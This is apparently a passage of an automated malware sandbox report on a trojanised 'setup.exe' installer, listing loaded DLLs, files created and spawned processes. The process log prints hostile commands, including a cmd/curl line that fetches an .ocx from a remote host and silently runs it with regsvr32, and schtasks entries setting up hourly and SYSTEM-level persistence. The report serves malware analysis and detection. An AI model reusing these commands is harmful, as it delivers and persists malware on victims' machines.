    Source: setup.exe, 00000000.00000003.2592893415.00000000083A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Numerics.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1755437103.0000000009AC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CAFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Metadata.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.2565051599.00000000083B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C80C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C88B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameShortcutFlags.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFileOperations.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C75A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.2592717830.000000000551C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C705000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSIInstaller.dll: vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.Sinks.Http.dllF vs setup.exe
    Source: setup.exe, 00000006.00000003.1932053520.000000000784C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs setup.exe
    Source: setup.exe, 00000006.00000000.1918990581.00000000006A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName36.exe. vs setup.exe
    Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: classification engineClassification label: mal56.troj.spyw.evad.winEXE@37/89@6/6
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00479740 FormatMessageW,GetLastError,0_2_00479740
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00480A10 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,0_2_00480A10
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004C7140 CoCreateInstance,0_2_004C7140
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0031A660 LoadResource,LockResource,SizeofResource,0_2_0031A660
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\AtomixJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\AtomixJump to behavior
    Source: C:\Program Files\Surfclub\Surfclub.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shiFAE8.tmpJump to behavior
    Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM `Property` WHERE `Property` = 'MsiLogging'2,;
    Source: setup.exe, 00000006.00000003.1926516070.0000000005476000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM `Property` WHERE ;
    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F14E2A76A442D6363321E428E36E8EED C
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="6264" CHAINERUIPROCESSID="6264Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\setup.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741190130 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\setup.exe" AI_INSTALL="1"
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 33E88EEEEB332764F0F0CD6649DD4742
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C61A3434910668BD7A1090272067B3E4 E Global\MSI0000
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Loop
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://datashieldsecure.com/amz/?source_id=1
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\262810.ocx"
    Source: unknownProcess created: C:\Program Files\Surfclub\Install.exe "C:\Program Files\Surfclub\Install.exe" install https://datashieldsecure.com/amz/?source_id=1
    Source: C:\Program Files\Surfclub\Install.exeProcess created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://datashieldsecure.com/amz/?source_id=1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\262810.ocx"
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="6264" CHAINERUIPROCESSID="6264Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\setup.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741190130 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\setup.exe" AI_INSTALL="1"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F14E2A76A442D6363321E428E36E8EED CJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 33E88EEEEB332764F0F0CD6649DD4742Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C61A3434910668BD7A1090272067B3E4 E Global\MSI0000Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" PersistentJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://datashieldsecure.com/amz/?source_id=1Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /fJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\262810.ocx"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\262810.ocx"
    Source: C:\Program Files\Surfclub\Install.exeProcess created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://datashieldsecure.com/amz/?source_id=1
    Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
